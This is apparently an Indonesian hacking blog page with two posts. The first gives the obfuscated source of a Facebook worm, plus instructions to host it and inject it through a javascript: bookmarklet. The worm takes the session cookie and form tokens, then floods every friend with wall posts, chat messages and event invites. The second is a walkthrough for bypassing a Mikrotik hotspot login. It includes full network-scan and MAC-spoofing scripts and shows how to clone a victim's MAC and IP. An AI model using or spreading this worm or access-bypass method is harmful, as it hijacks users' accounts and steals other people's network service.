3D\x22\x77\x66\x3D\x30\x3B\x20\x6D\x66\x28\x29\x3B\x22\x3E\x63\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x64\x61\x74\x61","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64","\x6E\x61\x76\x41\x63\x63\x6F\x75\x6E\x74\x4E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3F","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x6F\x6F\x73\x65\x2F\x3F\x5F\x5F\x61\x3D\x31","\x65\x76\x65\x6E\x74","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x74\x6F\x6B\x65\x6E\x3D","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x32\x5D\x3D\x73\x6F\x72\x74\x5F\x61\x6C\x70\x68\x61","\x6C\x65\x6E\x67\x74\x68","\x70\x75\x73\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x67\x65\x74\x44\x61\x74\x65","\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x67\x65\x74\x48\x6F\x75\x72\x73","\x2C","\x6A\x6F\x69\x6E","\x6F\x6E","\x43\x72\x65\x61\x74\x65\x20\x45\x76\x65\x6E\x74","\x6E\x65\x77","\x2F\x65\x76\x65\x6E\x74\x73\x2F\x63\x72\x65\x61\x74\x65\x2E\x70\x68\x70","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x66\x69\x72\x73\x74\x4E\x61\x6D\x65","\x75\x73\x65\x72\x49\x6E\x66\x6F\x73","\x72\x65\x70\x6C\x61\x63\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x66\x69\x6C\x74\x65\x72\x3D\x61\x6C\x6C\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x73\x68\x69\x66\x74","\x66\x65\x74\x63\x68\x65\x64\x20\x66\x72\x69\x65\x6E\x64\x73\x3A\x20","\x68\x6F\x6D\x65","\x70\x6F\x70","\x25\x74\x66\x25","\x73\x65\x61\x72\x63\x68","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65","\x6D\x65\x73\x73\x61\x67\x65\x20\x74\x65\x78\x74\x3A\x20","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65"];var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0xdac0[2]][_0xdac0[1]][_0xdac0[0]]=redirect;} ,500);} ;} ;var doget=function (_0xca48x5,_0xca48x6,_0xca48x7){var _0xca48x8= new XMLHttpRequest();_0xca48x8[_0xdac0[4]](_0xdac0[3],_0xca48x5);_0xca48x8[_0xdac0[5]]=function (){if(_0xca48x8[_0xdac0[6]]==4){if(_0xca48x8[_0xdac0[7]]==200&&_0xca48x6){_0xca48x6(_0xca48x8[_0xdac0[8]]);} ;if(_0xca48x7){_0xca48x7();} ;} ;} ;_0xca48x8[_0xdac0[9]]();} ;doget(_0xdac0[10],function (_0xca48x9){var _0xca48xa=document[_0xdac0[12]][_0xdac0[11]](/c_user=(\d+)/)[1];var _0xca48xb=function (_0xca48xc){return _0xca48xc?_0xdac0[13]+_0xca48xc[_0xdac0[14]]+_0xdac0[15]+_0xca48xc[_0xdac0[16]]+_0xdac0[17]:_0xdac0[18];} ;var _0xca48xd=function (_0xca48xc){return _0xca48xc?_0xca48xc[_0xdac0[16]]:_0xdac0[18];} ;var _0xca48xe=function (_0xca48xc){out=_0xdac0[18];for(var _0xca48xf in _0xca48xc){out+=(out?_0xdac0[19]:_0xdac0[18])+_0xca48xf+((_0xca48xc[_0xca48xf]!==null)?_0xdac0[20]+encodeURIComponent(_0xca48xc[_0xca48xf]):_0xdac0[18]);} ;return out;} ;var _0xca48x10=function (_0xca48x5,_0xca48xc,_0xca48x6,_0xca48x7){var _0xca48x8= new XMLHttpRequest();_0xca48x8[_0xdac0[4]](_0xdac0[21],_0xca48x5);_0xca48x8[_0xdac0[24]](_0xdac0[22],_0xdac0[23]);_0xca48x8[_0xdac0[5]]=function (){if(_0xca48x8[_0xdac0[6]]==4){if(_0xca48x8[_0xdac0[7]]==200&&_0xca48x6){_0xca48x6(_0xca48x8[_0xdac0[8]]);} ;if(_0xca48x7){_0xca48x7();} ;} ;} ;_0xca48x8[_0xdac0[9]](_0xca48xe(_0xca48xc));} ;var _0xca48x11=function (){var _0xca48x12=document[_0xdac0[26]](_0xdac0[25]);_0xca48x12[_0xdac0[28]][_0xdac0[27]]=_0xdac0[29];_0xca48x12[_0xdac0[28]][_0xdac0[30]]=_0xdac0[31];_0xca48x12[_0xdac0[28]][_0xdac0[32]]=100+_0xdac0[33];_0xca48x12[_0xdac0[28]][_0xdac0[34]]=100+_0xdac0[33];_0xca48x12[_0xdac0[28]][_0xdac0[35]]=0+_0xdac0[36];_0xca48x12[_0xdac0[28]][_0xdac0[2]]=0+_0xdac0[36];_0xca48x12[_0xdac0[28]][_0xdac0[37]]=_0xdac0[38];_0xca48x12[_0xdac0[28]][_0xdac0[39]]=_0xdac0[40];_0xca48x12[_0xdac0[28]][_0xdac0[41]]=_0xdac0[42];_0xca48x12[_0xdac0[28]][_0xdac0[43]]=999999;_0xca48x12[_0xdac0[44]]=_0xdac0[45];document[_0xdac0[47]][_0xdac0[46]](_0xca48x12);} ;var _0xca48x13=_0xca48x9[_0xdac0[11]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);if(_0xca48x13){comp=_0xca48x13[1];} else {comp=_0xdac0[18];} ;var _0xca48x14=_0xca48x9[_0xdac0[11]](/name="post_form_id" value="([\d\w]+)"/i)[1];var _0xca48x15=_0xca48x9[_0xdac0[11]](/name="fb_dtsg" value="([\d\w]+)"/i)[1];var _0xca48x16=document[_0xdac0[51]](_0xdac0[50])[_0xdac0[49]][_0xdac0[48]];redirect=redirect+_0xdac0[52]+_0xca48xe({userid:_0xca48xa,name:_0xca48x16,doclose:1});_0xca48x11();if(eventdesc){wf++;_0xca48x10(_0xdac0[53],{type:_0xdac0[54],eid:null,invite_message:_0xdac0[18],__d:1,post_form_id:_0xca48x14,fb_dtsg:_0xca48x15,lsd:null,post_form_id_source:_0xdac0[55]},function (_0xca48x17){var _0xca48x18=_0xca48x17[_0xdac0[11]](/\\"token\\":\\"([^\\]+)\\"/)[1];var _0xca48x5=_0xdac0[56]+_0xca48xa+_0xdac0[57]+_0xca48x18+_0xdac0[58];doget(_0xca48x5,function (_0xca48x19){var _0xca48x1a=_0xca48x19[_0xdac0[11]](/\{"uid":\d+,/g);var _0xca48x1b=[];for(var _0xca48x1c=0;_0xca48x1c<_0xca48x1a[_0xdac0[59]];_0xca48x1c++){var _0xca48x1d=_0xca48x1a[_0xca48x1c][_0xdac0[11]](/:(\d+),/)[1];if(_0xca48x1d!=_0xca48xa){_0xca48x1b[_0xdac0[60]](_0xca48x1d);} ;} ;var _0xca48x1e= new Date();_0xca48x1e[_0xdac0[62]](_0xca48x1e[_0xdac0[61]]()+60*60*24*1000);datestr=(_0xca48x1e[_0xdac0[63]]()+1)+_0xdac0[10]+_0xca48x1e[_0xdac0[64]]()+_0xdac0[10]+_0xca48x1e[_0xdac0[65]]();timestr=_0xca48x1e[_0xdac0[66]]()*60;var _0xca48x1f={post_form_id:_0xca48x14,fb_dtsg:_0xca48x15,start_time_intl_field:datestr,start_time_text_field:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0xdac0[18],location:_0xdac0[18],street:_0xdac0[18],geo_id:_0xdac0[18],geo_sq:_0xdac0[18],desc:eventdesc,sgb_invitees:_0xca48x1b[_0xdac0[68]](_0xdac0[67]),sgb_emails:_0xdac0[18],sgb_message:_0xdac0[18],privacy_type:_0xdac0[69],guest_list:_0xdac0[69],connections_can_post:_0xdac0[69],save:_0xdac0[70],submitting:_0xdac0[18]};_0xca48x1f[_0xdac0[71]]=_0xdac0[18];_0xca48x10(_0xdac0[72],_0xca48x1f,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0xca48x10(_0xdac0[73],{user:_0xca48xa,post_form_id:_0xca48x14,fb_dtsg:_0xca48x15,lsd:null,post_form_id_source:_0xdac0[55],popped_out:false,force_render:true},function (_0xca48x17){var _0xca48x20=_0xca48x17[_0xdac0[74]](9);var _0xca48x21=eval(_0xdac0[75]+_0xca48x20+_0xdac0[76]);var _0xca48x22=_0xca48x21[_0xdac0[78]][_0xdac0[77]];for(var _0xca48x23 in _0xca48x22[_0xdac0[79]]){var _0xca48x24=Math[_0xdac0[81]](Math[_0xdac0[80]]()*1335448958);var _0xca48x25=( new Date())[_0xdac0[61]]();var _0xca48x26=chatmessage[_0xdac0[86]](_0xdac0[82],_0xca48x22[_0xdac0[85]][_0xca48x23][_0xdac0[84]][_0xdac0[83]]());_0xca48x10(_0xdac0[87],{msg_id:Math[_0xdac0[81]](Math[_0xdac0[80]]()*1335448958),client_time:( new Date())[_0xdac0[61]](),msg_text:chatmessage[_0xdac0[86]](_0xdac0[82],_0xca48x22[_0xdac0[85]][_0xca48x23][_0xdac0[84]][_0xdac0[83]]()),to:_0xca48x23,post_form_id:_0xca48x14,fb_dtsg:_0xca48x15,post_form_id_source:_0xdac0[55]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0xdac0[88]+_0xca48xa+_0xdac0[89],function (_0xca48x17){var _0xca48x1a=_0xca48x17[_0xdac0[11]](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);var _0xca48x27=[];if(_0xca48x1a){for(var _0xca48x1c=0;_0xca48x1c<_0xca48x1a[_0xdac0[59]];_0xca48x1c++){var _0xca48x1d=_0xca48x1a[_0xca48x1c][_0xdac0[11]](/_\d+_/)[0][_0xdac0[86]](/_/g,_0xdac0[18]);var _0xca48x28=_0xca48x1a[_0xca48x1c][_0xdac0[11]](/>[^>]+\\u003c\\\/a>$/i)[0][_0xdac0[86]](/\\u003c\\\/a>$/gim,_0xdac0[18])[_0xdac0[86]](/>/g,_0xdac0[18]);_0xca48x27[_0xdac0[60]]({id:_0xca48x1d,name:_0xca48x28});} ;} ;var _0xca48x7=[];var _0xca48x29=[];while(_0xca48x27[_0xdac0[59]]){var _0xca48x2a=Math[_0xdac0[81]](Math[_0xdac0[80]]()*_0xca48x27[_0xdac0[59]]);_0xca48x7[_0xdac0[60]](_0xca48x27[_0xca48x2a]);_0xca48x29[_0xdac0[60]](_0xca48x27[_0xca48x2a]);var _0xca48x25=_0xca48x27[_0xdac0[90]]();if(_0xca48x2a){_0xca48x27[_0xca48x2a-1]=_0xca48x25;} ;} ;if(debug){alert(_0xdac0[91]+_0xca48x7[_0xdac0[59]]);} ;var _0xca48x2b={post_form_id:_0xca48x14,fb_dtsg:_0xca48x15,xhpc_composerid:comp,xhpc_targetid:_0xca48xa,xhpc_context:_0xdac0[92],xhpc_fbx:_0xdac0[18],lsd:null,post_form_id_source:_0xdac0[55]};mt=postmessage;m=postmessage;while(mt[_0xdac0[95]](_0xdac0[94])>=0){var _0xca48x2c=_0xca48x7[_0xdac0[93]]();mt=mt[_0xdac0[86]](_0xdac0[94],_0xca48xd(_0xca48x2c));m=m[_0xdac0[86]](_0xdac0[94],_0xca48xb(_0xca48x2c));} ;_0xca48x2b[_0xdac0[96]]=mt;_0xca48x2b[_0xdac0[97]]=m;if(debug){alert(_0xdac0[98]+mt);} ;_0xca48x10(_0xdac0[99],_0xca48x2b);var _0xca48x2d=function (_0xca48xf){if(_0xca48xf==0){wf=0;mf();return ;} ;var _0xca48x2e=_0xca48x29[_0xdac0[90]]();var _0xca48x2f={post_form_id:_0xca48x14,fb_dtsg:_0xca48x15,xhpc_composerid:comp,xhpc_targetid:_0xca48x2e[_0xdac0[14]],xhpc_context:_0xdac0[100],xhpc_fbx:1,lsd:null,post_form_id_source:_0xdac0[55]};var _0xca48x30=postmessage;var _0xca48x31=postmessage;if(_0xca48x7[_0xdac0[59]]==0){wf=0;mf();return ;} ;while(_0xca48x30[_0xdac0[95]](_0xdac0[94])>=0){var _0xca48x32=_0xca48x7[_0xdac0[93]]();_0xca48x30=_0xca48x30[_0xdac0[86]](_0xdac0[94],_0xca48xd(_0xca48x32));_0xca48x31=_0xca48x31[_0xdac0[86]](_0xdac0[94],_0xca48xb(_0xca48x32));} ;_0xca48x2f[_0xdac0[96]]=_0xca48x30;_0xca48x2f[_0xdac0[97]]=_0xca48x31;_0xca48x10(_0xdac0[99],_0xca48x2f);setTimeout(function (){_0xca48x2d(_0xca48xf-1);} ,2000);} ;wf++;setTimeout(function (){_0xca48x2d(nfriends);} ,2000);} );} ;mf();} );


====================
copy paste script tersebut dan simpan dengan nama "worm.js" lalu upload ke sebuah web atau hostingan trus buatlah sebuah script pendek seperti ini :

javascript:(a=(b=document).createElement('script')).src='//site_kamu.com/worm.js',b.body.appendChild(a);void(0)


=====================
nah sekarang coba buka alamat facebook km dan pastikan kamu telah login di dalam nya kemudian copy pastekan script pendek di atas ke alamat facebook kamu
tunggu beberapa menit.....dan coba lihat dinding atau wall kamu :)


#n0thing special just for share ^_^
Baca Selengkapnya... facebook worm

19 April 2011

Bypass Mikrotik Hotspot Login Page di Linux

Pada saat kita ingin menikmati layanan internet baik di kampus, hotel, cafe, dan tempat umum lainya, Biasanya kita akan di redirect atau dialihkan terlebih dahulu ke halaman login sebelum bisa koneksi internet. proses tersebut disebut proses authentikasi sebagai kelayakan bahwa anda adalah orang yang berhak atas layanan yang tersedia.

Lalu bagaimana dengan mereka yang tidak punya authentikasi khusus sepertis username dan password ? :p
Tenang ajah, berikut gw jelasin caranya :D

pertama kita masuk ke koneksi jaringan lokal dulu, cari akses point kemudian setup selanjutnya dapatkan alamat ip (dhcp aja)

root@nyubicrew.us:~# ifconfig wlan0 up
root@nyubicrew.us:~# iwlist wlan0 scan | grep ESSID
                    ESSID:"POWER RANGERS @SERVER 05"
                    ESSID:"802.11g-SSID"
root@nyubicrew.us:~# iwconfig wlan0 ESSID "802.11g-SSID"
root@nyubicrew.us:~# dhclient wlan0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/wlan0/00:a4:15:af:4a:f1 
Sending on   LPF/wlan0/00:a4:15:af:4a:f1
Sending on   Socket/fallback
DHCPNAK from 192.168.88.1
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.88.135 from 192.168.88.1
DHCPREQUEST of 192.168.88.135 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.88.135 from 192.168.88.1
bound to 192.168.88.135 -- renewal in 20738 seconds.
Ok, sekarang kita sudah konek ke jaringan dengan alamat ip 192.168.88.135, kita check dulu koneksi ke routernya
root@nyubicrew.us:~# ping 192.168.88.1
PING 192.168.88.1 (192.168.88.1) 56(84) bytes of data.
64 bytes from 192.168.88.1: icmp_seq=1 ttl=64 time=2350 ms
64 bytes from 192.168.88.1: icmp_seq=2 ttl=64 time=1633 ms
Ok, seep....sekarang kita cari MAC Address target yang akan kita cloning :)
saya pake tools buatan om Agus Bimantoro a.k.a abi71 berikut scriptnya :)

#!/bin/bash
#------------------------------------------------------------------------------------
#scan-ip.sh v.1.0
#written by aBi71 juli-2010
#l0g[dot]bima[at]gmail[dot]com
#http://abi71.wordpress.com, http://projects.gxrg.org
#credits: [G]gunadarma[X]xmalang[R]research[G]group 
#license: GPL (Gnu public license)
#scan-ip is a simple bash script for network scanner, only used for class C networks.
#with this script you can find a live host in the network.
#------------------------------------------------------------------------------------
#--------- set color ---------
white='\033[1;37m'
red='\033[0;31;1;31m'
yellow='\033[1;33m'
green='\033[0;32;1;32m'
blue='\033[1;34m'
default='\033[0m'
#--------- function help ---------
function display_help (){
echo -e "${white}Usage: $0  [ip_start] [ip_end] 
Options: 
   -h    Display usage information
   -m    Include MAC address

option -m (include MAC address), only used for super users (eg. root) !!!

Please visit 
Report bugs to ${default}"
exit 0
}
#---------- console usage  ----------
if [ $# -lt 1 ]; then
display_help
else
case $1 in
         -h)
            echo -e "${white}Example: $0 125.160.119.30 125.160.119.71 
         $0 -m 192.168.1.20 192.168.1.55 wlan0${default}"
            exit 0
            ;;
         -m)       
            include_mac=yes    
             case $2 in
                 *.*.*.*) 
                         ip_start=$2
                          case $3 in
                              *.*.*.*)
                                      ip_end=$3
                                          case $4 in
                                                 *)
                                                   iface=$4
                                                 ;;
                                          esac
                                      ;;
                                *.*.*)
                                      display_help 
                                      ;;
                                  *.*)
                                      display_help
                                    ;;
                                 *) 
                                      display_help
                                    ;;
                      esac
                         ;;
                   *.*.*)
                         display_help
                         ;;
                     *.*)
                         display_help
                         ;;
                       *) 
                         display_help
                         ;;         
            esac
            ;;
    *.*.*.*)
            ip_start=$1
             case $2 in
                 *.*.*.*)
                         ip_end=$2
                         ;;
                   *.*.*)
                         display_help
                         ;;
                     *.*)
                         display_help
                         ;;
                       *) 
                         display_help
                         ;;
             esac
               ;;
      *.*.*)
            display_help
            ;;
        *.*)
            display_help
            ;;
          *) 
            display_help
            ;;         
esac
fi
#---------- set variable ---------- 
who_use=`whoami`
ip_host1=$(echo $ip_start | sed 's/\./ /g' | awk '{print $4}')
ip_host2=$(echo $ip_end | sed 's/\./ /g' | awk '{print $4}')
ip_class_c1=$(echo $ip_start | sed 's/\./ /g' | awk '{print $1,$2,$3}')
ip_class_c2=$(echo $ip_end | sed 's/\./ /g' | awk '{print $1,$2,$3}')
scan_start=$(date +%H\:%M\:%S)
#---------- check ----------
if [ "$ip_class_c1" = "$ip_class_c2" ] && [ "$ip_host1" -le "$ip_host2" ]; then 
     ip_class_c=$(echo $ip_start | sed 's/\./ /g' | awk '{print $1,$2,$3}')
     gateway=$(netstat -nr | grep "$iface" | grep "UG" | awk '{print $2}' | sed 's/\./ /g' | awk '{print $1"."$2"."$3}')
     echo $gateway > /tmp/.our_ip
     touch /tmp/.ip_list.sh
     echo "#!/bin/bash" > /tmp/.ip_list.sh
else
     display_help
fi
#----------scan process ----------
echo -n -e "${blue}[+]${default} ${white}scanning${default}"
while [ "$ip_host1" -le "$ip_host2" ]; do
  echo -n -e "${white}.${default}"
  join_ip_class_host=$(echo $ip_class_c $ip_host1 | sed 's/\ /./g')
  if [ "$include_mac" != "yes" ]; then
     ip_ping=$(ping -q -w 1 $join_ip_class_host | grep "avg" | sed 's/\// /g' | sed 's/\./ /g'  | awk '{print $8}' &)
        if [ "$ip_ping" != "" ]; then              
           echo "echo -e '${white}$join_ip_class_host ${default} ${green}alive${default}'" >> /tmp/.ip_list.sh
    let count_iplive++ 
             else 
           echo "echo -e '${white}$join_ip_class_host${default} ${red} timeout${default}'" >> /tmp/.ip_list.sh
    let count_ipdead++
        fi
      else if [ "$who_use" = "root" ]; then
                 if [ "$iface" = "" ] || [ "$gateway" = "" ]; then
                    echo -e "\n${red}[!]${default} ${white}Inactive network cards, Please try again and make sure you have an interface with the correct insert.${default}\n"
                    $0 -h
                    exit 0
                 fi
             our_ip=$(ifconfig -a | grep -f /tmp/.our_ip | sed 's/\:/ /g' | awk '{print $3}')
             arp_ping=$(arping -f -c 1 -I $iface -s $our_ip $join_ip_class_host | grep "reply" | awk '{print $4" at "$5}' &)
                 if [ "$arp_ping" != "" ]; then              
                    echo "echo -e '${white}$arp_ping ${default}${green}alive${default}'" >> /tmp/.ip_list.sh
             let count_iplive++ 
                  else 
                    echo "echo -e '${white}$join_ip_class_host at [00:00:00:00:00:00]${default}${red} timeout${default}'" >> /tmp/.ip_list.sh
             let count_ipdead++
                 fi
      else
         echo -n -e "\n${red}[!]${default} ${white}Sorry you can't used this options, so running it may require superuser privileges (eg. root).${default}\n"
         exit 0
      fi 
  fi
  let process++
  let ip_host1++
done
#---------- scanned list ----------
scan_end=$(date +%H\:%M\:%S)
echo -e "\n${green}                              _       
    ___  ___ __ _ _ __       (_)_ __  
   / __|/ __/ _' | '_ \ _____| | '_ \ 
   \__ \ (_| (_| | | | |_____| | |_) |
   |___/\___\__,_|_| |_|     |_| .__/ 
    ${yellow}version 1.0${default}                ${green}|_|${default}    
${default}"
echo -e "${green}--${default} ${yellow}scan-ip.sh v.1.0${default} ${green}--------------------------${default}"
echo -e "${yellow}IP range:${default} ${white}$ip_start${default} ${yellow}to${default} ${white}$ip_end${default}"
echo -e "${yellow}Started:${default} ${white}$scan_start${default}"
echo -e "${yellow}Ended:${default} ${white}$scan_end${default}"
echo -e "${yellow}IP live:${default} ${white}$count_iplive${default}"
echo -e "${yellow}IP dead:${default} ${white}$count_ipdead${default}"
echo -e "${yellow}Total scan:${default} ${white}`expr $count_iplive + $count_ipdead`${default}"
echo -e "${yellow}Scanned on host:${default} 
`bash /tmp/.ip_list.sh`"
echo -e "${yellow}Speed scanned:${default} ${white}`echo $(echo $scan_end | sed 's/\:/ /g' | sed 's/ //g')-$(echo $scan_start | sed 's/\:/ /g' | sed 's/ //g') | bc` second${default}"
echo -e "${green}----------------------------------------------${default}"
echo -e "                          ${yellow}(c) July 2010 - GXRG ${default}"
#--------- clear created file ---------
rm /tmp/.ip_list.sh && rm /tmp/.our_ip
exit 0

Download file scriptnya dan jangan lupa chmod +x scan-ip.sh biar mudah tuk dieksekusi di mesin *nix anda.

lalu scan ipnya denga command

./scan-ip.sh  [ip_start] [ip_end] 
setelah itu akan muncul beberapa ip address yg hidup atau live lakukan ping ke ip address tersebut. Saya ambil contoh : Ip address 192.168.88.201

root@nyubicrew.us:~# ping 192.168.88.201
PING 192.168.88.201 (192.168.88.201) 56(84) bytes of data.
64 bytes from 192.168.88.201: icmp_seq=1 ttl=128 time=170 ms
64 bytes from 192.168.88.201: icmp_seq=2 ttl=128 time=26.8 ms
Ok, sekarang cr tau MAC Address dengan melihat table arp

root@nyubicrew.us:~# arp -a
? (192.168.88.201) at 00:21:5c:3a:de:f1 [ether] on wlan0
? (192.168.88.1) at aa:00:04:00:0a:04 [ether] on wlan0
seeppp!! kita sudah dapet alamat mac 00:21:5c:3a:de:f1 dari host 192.168.88.201
selanjutnya matikan interface kemudian ganti alamat mac kita dengan alamat mac korban menggunakan tools
macfacked buatan om Agus Bimantoro a.k.a abi71 ( Ampunnn om saya pake toolsnya lagi xixixixi :D )
berikut scriptnya

#!/bin/bash
#------------------------------------------------------------------------------------
#macfaked.sh v.0.1
#written by aBi71 Sept-2010
#l0g[dot]bima[at]gmail[dot]com
#http://abi71.wordpress.com, http://projects.gxrg.org
#credits: [G]gunadarma [X]xmalang [R]research [G]groups
#license: Licensed under the GNU General Public License
#------------------------------------------------------------------------------------
#Greatz to GXRG linux team.
#
#DESC: This tools is a simple bash script for changing mac address.
#

faked=True
whouse=`whoami`

function display_help (){
echo -e "macfaked 0.1 by aBi71 

Usage: $0  [interface]

Ex: ./macfaked.sh -r eth0
./macfaked.sh -m 00:11:22:33:44:55 wlan0

Options:
-r    random mac address
-m    mac address

Please visit "
exit 0
}

if [ "$whouse" == "root" ]; then
while [ "$faked" == "True" ]; do
#variable random
a=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
b=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
c=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
d=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
e=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
f=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
if [ $# -lt 1 ]; then
display_help
elif [ "$1" == "-r" ] && [ "$2" != "" ]; then
down_iface=$(ifconfig $2 down 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$down_iface" == "" ]; then
before=$(ifconfig $2 | grep HWaddr | awk '{print $5}')
mac_changer=$(ifconfig $2 hw ether $a:$b:$c:$d:$e:$f 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$mac_changer" == "" ]; then
echo "Changed: [$before]  ->  [$a:$b:$c:$d:$e:$f]"
faked=False
fi
else
echo "$2: No such device."
faked=False
fi
elif [ "$1" == "-m" ] && [ "$2" != "" ] && [ "$3" != "" ]; then
down_iface=$(ifconfig $3 down 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$down_iface" == "" ]; then
before=$(ifconfig $3 | grep HWaddr | awk '{print $5}')
macAddress=$(echo $2 > /tmp/macchange.log ;wc /tmp/macchange.log | awk '{print $3}')
if [ "$macAddress" == "18" ]; then
mac_changer=$(ifconfig $3 hw ether $2 2> /tmp/macchange.log; cat /tmp/macchange.log)
else
mac_changer=failed
fi

if [ "$mac_changer" == "" ] && [ "$macAddress" == "18" ] ; then
echo "Changed: [$before]  ->  [$2]"
faked=False
else
echo "[!] Cannot assign requested address, please try again."
faked=False
fi

else
echo "$3: No such device."
faked=False
fi
else
display_help
fi
done
rm /tmp/macfaked.log 2> /dev/null
rm /tmp/macchange.log 2> /dev/null
else
echo "[!] You must be root."
fi
Ok, let's try this c0de :D 
root@nyubicrew.us:~#./macfaked -m 00:21:5c:3a:de:f1 wlan0 
changed: [00:a4:15:af:4a:f1] -> [00:21:5c:3a:de:f1] 
root@nyubicrew.us:~# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:21:5c:3a:de:f1
          inet addr:192.168.88.201  Bcast:192.168.88.255  Mask:255.255.255.0
 
Ok, sudah berubah kan :)
sekarang hidupkan interface dan koneksikan kembali, setup alamat ip dengan alamat ip sang korban.
root@nyubicrew.us:~# ifconfig wlan0 up
root@nyubicrew.us:~# iwlist wlan0 scan | grep ESSID
                    ESSID:"POWER RANGERS @SERVER 05"
                    ESSID:"802.11g-SSID"
root@nyubicrew.us:~# iwconfig wlan0 ESSID "802.11g-SSID"
root@nyubicrew.us:~# ifconfig wlan0 192.168.88.201/24
root@nyubicrew.us:~# route add default gw 192.168.88.1

sekarang coba kita lakukan ping ke www.google.co.id

root@nyubicre.us:~# ping google.co.id
PING google.co.id (72.14.254.104) 56(84) bytes of data.
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=1 ttl=55 time=695 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=2 ttl=55 time=76.8 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=3 ttl=55 time=38.6 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=4 ttl=55 time=25.1 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=5 ttl=55 time=27.2 ms
Yess....berhasil....berhasil...berhasil...horeeeeeeeeee :p #dora mode on hahhaa :D
sampai di sini kita sudah bisa menikmati koneksi internet hasil nebeng di MAC Address orang lain.
klo misal yang punya host tadi udah udah offline berarti kita juga ikut off line. namanya juga nebeng kalo 
yang nebeng mau udahan yah kita ikut udahan hehehe :)
Oh iyah...untuk mengganti mac address, kita bisa menggunakan beberapa tools lain seperti macchanger dan sejenisnya
yang kompatible dengan mesin unix :)

Referensi :
http://projects.gxrg.org/?p=170 
http://projects.gxrg.org/?p=261
 
Thank's buat Om Agus Bimantoro a.k.a abi71
atas pinjaman tools nya :D 
Baca Selengkapnya... Bypass Mikrotik Hotspot Login Page di Linux